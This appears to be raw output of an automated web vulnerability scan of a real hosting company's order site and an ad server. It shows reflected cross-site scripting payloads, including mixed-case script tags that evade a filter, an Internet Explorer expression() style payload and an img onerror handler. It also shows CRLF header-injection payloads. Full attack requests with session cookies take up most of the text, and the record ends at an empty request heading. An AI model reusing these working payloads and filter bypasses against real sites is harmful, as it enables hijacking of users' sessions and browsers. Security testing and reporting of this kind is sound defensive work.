GET /xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/MsHosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/MsHosting. The payload 9d4af</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>542f10c1a1e was submitted in the REST URL parameter 3. This input was returned as 9d4af</ScRiPt ><ScRiPt>alert(1)</ScRiPt>542f10c1a1e in a subsequent request for the URL /xml/order/MsHosting.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/MsHosting9d4af</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>542f10c1a1e;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10
Request 2
GET /xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10
The value of REST URL parameter 3 submitted to the URL /xml/order/Service is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Service. The payload 2eb97</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>359b8a2e72d was submitted in the REST URL parameter 3. This input was returned as 2eb97</ScRiPt ><x style=x:expression(alert(1))>359b8a2e72d in a subsequent request for the URL /xml/order/Service.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/Service2eb97</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>359b8a2e72d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/Service;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/Sharepoint is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Sharepoint. The payload 2f20e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>1ed21c34ec was submitted in the REST URL parameter 3. This input was returned as 2f20e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>1ed21c34ec in a subsequent request for the URL /xml/order/Sharepoint.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/Sharepoint2f20e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>1ed21c34ec;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/VirtualServerL is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/VirtualServerL. The payload dddff</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>d0fee8f5448 was submitted in the REST URL parameter 3. This input was returned as dddff</ScRiPt ><img src=a onerror=alert(1)>d0fee8f5448 in a subsequent request for the URL /xml/order/VirtualServerL.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
The value of REST URL parameter 3 submitted to the URL /xml/order/popupDomainPrices is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/popupDomainPrices. The payload 753b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>63529f6639f was submitted in the REST URL parameter 3. This input was returned as 753b5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>63529f6639f in a subsequent request for the URL /xml/order/popupDomainPrices.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/popupDomainPrices753b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>63529f6639f;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 1 is copied into the Location response header. The payload 301c5%0d%0a8c848ec608 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /301c5%0d%0a8c848ec608/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-1254652388917369&adurl=;ord=862444845? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
The value of REST URL parameter 1 is copied into the Location response header. The payload 9255d%0d%0a5f9b348da50 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9255d%0d%0a5f9b348da50/N5621.66.2412875475321/B4682155;sz=728x90;;click=http://yads.zedo.com/ads2/c?a=914396%3Bn=1219%3Bx=24093%3Bc=1219000054,1219000049%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=1%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=jhmxpQoBADYAAET@BzgAAAAW~022111%3Bk%3D;ord=0.5315556428395212? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.alexa.com/siteinfo/xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
The value of REST URL parameter 1 is copied into the Location response header. The payload 85d67%0d%0af8e979beb10 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /85d67%0d%0af8e979beb10/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.robtex.com/ext/ads/buchscr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
The value of the $ request parameter is copied into the Set-Cookie response header. The payload 29621%0d%0ac2b3a7ca40d was submitted in the $ parameter. This caused a response containing an injected HTTP header.
The value of the jsessionid request parameter is copied into the Location response header. The payload ed455%0d%0a503217b4f8d was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_toped455%0d%0a503217b4f8d&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the linkId request parameter is copied into the Location response header. The payload c29e1%0d%0a97b1abda1ab was submitted in the linkId parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=c29e1%0d%0a97b1abda1ab&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the linkOrigin request parameter is copied into the Location response header. The payload a5802%0d%0a86591ee57c3 was submitted in the linkOrigin parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=a5802%0d%0a86591ee57c3&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
3.8. http://order.1and1.com/xml/order/Jumpto [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://order.1and1.com
Path:
/xml/order/Jumpto
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload b9161%0d%0a0390bad3044 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue&b9161%0d%0a0390bad3044=1 HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the origin.page request parameter is copied into the Location response header. The payload 2e03b%0d%0ad348ca74978 was submitted in the origin.page parameter. This caused a response containing an injected HTTP header.
Request
